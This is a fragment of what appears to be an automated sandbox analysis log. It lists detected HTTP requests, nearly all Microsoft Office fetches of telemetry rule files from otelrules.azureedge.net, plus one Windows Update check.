              Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=XReSa52zmeSff4o&MD=elPKToF1 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
              Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
